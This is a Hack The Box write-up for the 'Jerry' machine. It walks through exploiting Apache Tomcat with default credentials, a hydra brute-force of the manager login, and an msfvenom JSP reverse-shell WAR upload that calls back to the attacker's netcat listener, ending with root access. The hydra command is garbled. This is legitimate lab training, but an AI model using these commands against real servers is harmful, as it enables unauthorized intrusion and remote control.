Hackthebox writeup for Jerry
What are war files ? If an application allows us to upload such a file, then can we create such a file and obtain a reverse shell through it ?
Nmap scan reveals that it’s an apache tomcat web server.
Tomcat is a web server for hosting java files.
Login to the application and click on server status, it asks for authentication. The default credential “admin admin” works,
Next, we click on Manager => List Applications, we get access denied.
In order to find out why we are getting access denied error we will use burpsuite.
If we send the authorization header to decoder, it turns out that the application is trying to login with admin admin. If you remove the header and forward the request it works !
We’ll try to bruteforce for the password with hydra and seclist as the wordlist.
find . | grep -i tomcatHydra -C /usr/share/seclists/Passwords/../../betterdefaultpassists.txt http- get://10.10.10.95:8080/manager/html
Password is, tomcat:secret
This provides us access to the application. There’s an option to upload a war file ! Can we use this kind of file upload for getting reverse shell ?
What is a war file
A WAR file (Web Application Resource or Web application ARchive) is a file used to distribute a collection of Jar-files, Java Server Pages, Java Servlets, Java Classes, XML files and other resources that together constitute a web application.
Turns out that we can create such war files with msfvenom, not only that but we can create payloads of various other forms using msfvenom, below is the list from offsec page,
root@kali:~# msfvenom --help-formats Executable formatsasp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small,
hta-psh, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection,
psh-cmd, vba, vba-exe, vba-psh, vbs, warTransform formats bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl,
powershell, ps1, py, python, raw, rb, ruby, sh,
Create a msfvenom payload using below command.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4455 -f war > shell.war
Set up netcat listener
nc -nlvp 4455
Browse the file from browser
Obtain reverse shell :
The whoami command here returns an output that we can be very happy about. We are already root !
So, just grab the flag
Skills that I learnt from this machine
To use burpsuite for troubleshooting.
To create a jsp shell using msfvenom in war format and obtain a reverse shell from it.